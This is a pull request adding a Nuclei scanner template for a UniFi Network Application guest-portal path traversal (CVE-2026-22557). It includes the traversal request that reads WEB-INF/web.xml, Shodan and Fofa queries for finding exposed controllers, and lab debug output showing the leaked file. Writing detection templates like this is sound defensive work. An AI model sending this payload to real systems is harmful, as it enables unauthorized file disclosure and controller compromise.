### PR TITLE
Create CVE-2026-22557.yaml

### DIFF
--- a/http/cves/2026/CVE-2026-22557.yaml
+++ b/http/cves/2026/CVE-2026-22557.yaml
@@ -41,6 +41,6 @@ http:
       - type: dsl
         dsl:
           - 'contains_all(body, "<servlet>","<web-app")'
-          - 'contains(content_type, "xml")'
+          - 'contains(content_type, "application/xml")'
           - 'status_code == 200'
         condition: and

--- a/http/cves/2026/CVE-2026-22557.yaml
+++ b/http/cves/2026/CVE-2026-22557.yaml
@@ -1,15 +1,15 @@
 id: CVE-2026-22557
 
 info:
-  name: UniFi Network Application - Unauthenticated Path Traversal
+  name: UniFi Network Application - Path Traversal
   author: Aryu-RU
   severity: critical
   description: |
-    UniFi Network Application prior to 9.0.118, 10.1.89, and 10.2.97 is affected by an unauthenticated path traversal in the guest portal. The `page_error` parameter of the `/guest/s/<site>/login` endpoint is passed to the portal resource loader without validation, allowing a remote attacker to read arbitrary files from the application (for example WEB-INF/web.xml) without authentication.
+    UniFi Network Application contains a path traversal vulnerability allowing a network attacker to access and manipulate files on the underlying system, potentially leading to account access, exploit requires network access.
   impact: |
-    Disclosure of sensitive application files such as configuration and credential material can be leveraged to access an underlying account, leading to full compromise of the controller.
+    Network attackers can access and manipulate system files, potentially compromising user accounts and system integrity.
   remediation: |
-    Upgrade UniFi Network Application to 9.0.118, 10.1.89, 10.2.97, or later.
+    Update to the latest version of UniFi Network Application.
   reference:
     - https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b
     - https://github.com/ThePotatoOfDoom/CVE-2026-22557-PoC
@@ -33,15 +33,14 @@ info:
 http:
   - raw:
       - |
-        GET /guest/s/default/login?page_error=../../web.xml HTTP/1.1
+        GET /guest/s/default/login?page_error=..%2F..%2Fweb.xml HTTP/1.1
         Host: {{Hostname}}
-        Referer: https://{{Hostname}}/guest/s/default/?id=aa:bb:cc:dd:ee:ff&ap=00:11:22:33:44:55&ssid=test&url=http://example.com
+        Referer: {{RootURL}}/guest/s/default/?id=aa:bb:cc:dd:ee:ff&ap=00:11:22:33:44:55&ssid=test&url=http://example.com
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
+          - 'contains_all(body, "<servlet>","<web-app")'
           - 'contains(content_type, "xml")'
-          - 'contains(body, "<web-app")'
-          - 'contains_any(body, "Ubiquiti Networks: Management Console", "com.ubnt.ace")'
+          - 'status_code == 200'
         condition: and

--- a/http/cves/2026/CVE-2026-22557.yaml
+++ b/http/cves/2026/CVE-2026-22557.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-22557
+
+info:
+  name: UniFi Network Application - Unauthenticated Path Traversal
+  author: Aryu-RU
+  severity: critical
+  description: |
+    UniFi Network Application prior to 9.0.118, 10.1.89, and 10.2.97 is affected by an unauthenticated path traversal in the guest portal. The `page_error` parameter of the `/guest/s/<site>/login` endpoint is passed to the portal resource loader without validation, allowing a remote attacker to read arbitrary files from the application (for example WEB-INF/web.xml) without authentication.
+  impact: |
+    Disclosure of sensitive application files such as configuration and credential material can be leveraged to access an underlying account, leading to full compromise of the controller.
+  remediation: |
+    Upgrade UniFi Network Application to 9.0.118, 10.1.89, 10.2.97, or later.
+  reference:
+    - https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b
+    - https://github.com/ThePotatoOfDoom/CVE-2026-22557-PoC
+    - https://www.cycognito.com/blog/emerging-threat-ubiquiti-unifi-network-application-path-traversal-cve-2026-22557/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-22557
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-22557
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:ui:unifi_network_application:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ui
+    product: unifi_network_application
+    shodan-query: http.title:"UniFi Network"
+    fofa-query: title="UniFi Network"
+  tags: cve,cve2026,unifi,ubnt,lfi,traversal,unauth
+
+http:
+  - raw:
+      - |
+        GET /guest/s/default/login?page_error=../../web.xml HTTP/1.1
+        Host: {{Hostname}}
+        Referer: https://{{Hostname}}/guest/s/default/?id=aa:bb:cc:dd:ee:ff&ap=00:11:22:33:44:55&ssid=test&url=http://example.com
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "xml")'
+          - 'contains(body, "<web-app")'
+          - 'contains_any(body, "Ubiquiti Networks: Management Console", "com.ubnt.ace")'
+        condition: and


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2026-22557 — **UniFi Network Application - Unauthenticated Path Traversal**.
  The `page_error` parameter of the guest portal endpoint `/guest/s/<site>/login` is passed to the portal resource loader without validation, letting an unauthenticated remote attacker read arbitrary files from the application (e.g. `WEB-INF/web.xml`). The detection performs a single, non-destructive GET that reads `WEB-INF/web.xml` and matches on UniFi-specific deployment-descriptor content, so it confirms the bug rather than fingerprinting a version. Affected: versions prior to `9.0.118`, `10.1.89`, and `10.2.97` (CVSS 3.1 base 10.0, CWE-22).
- References:
  - Vendor advisory (Ubiquiti Security Bulletin 062): https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b
  - Public PoC: https://github.com/ThePotatoOfDoom/CVE-2026-22557-PoC
  - Analysis: https://www.cycognito.com/blog/emerging-threat-ubiquiti-unifi-network-application-path-traversal-cve-2026-22557/
  - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22557

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->

**Lab setup (local Docker):**
- Vulnerable: `lscr.io/linuxserver/unifi-network-application:10.1.85` + `mongo:7.0`
- Patched: `lscr.io/linuxserver/unifi-network-application:10.1.89` + `mongo:7.0`

**True Positive — vulnerable 10.1.85:**

```
$ nuclei -t http/cves/2026/CVE-2026-22557.yaml -u https://127.0.0.1:8843 -debug

[CVE-2026-22557] Dumped HTTP request
GET /guest/s/default/login?page_error=../../web.xml HTTP/1.1
Host: 127.0.0.1:8843
Referer: https://127.0.0.1:8843/guest/s/default/?id=aa:bb:cc:dd:ee:ff&ap=00:11:22:33:44:55&ssid=test&url=http://example.com

HTTP/1.1 200
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="3.0" xmlns="http://java.sun.com/xml/ns/javaee" ...>
    <display-name>Ubiquiti Networks: Management Console</display-name>
    <servlet>
        <servlet-name>UniFiResourceServlet</servlet-name>
        <servlet-class>com.ubnt.ace.api.ApiServlet</servlet-class>
    ...

[CVE-2026-22557] [http] [critical] https://127.0.0.1:8843/guest/s/default/login?page_error=../../web.xml
```

The guest portal is reachable on the controller's `8443`, `8843` and `8880` ports; the template matched on all three.

**True Negative — patched 10.1.89 (no false positive):**

```
$ nuclei -t http/cves/2026/CVE-2026-22557.yaml -u https://127.0.0.1:9843
[INF] No results found.
```

The patched build returns an empty `text/html` body for the same request (traversal blocked), so the matcher does not fire. A generic web server (nginx) was also tested and did not match.

**Search queries:**
- Shodan: `http.title:"UniFi Network"`
- Fofa: `title="UniFi Network"`

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
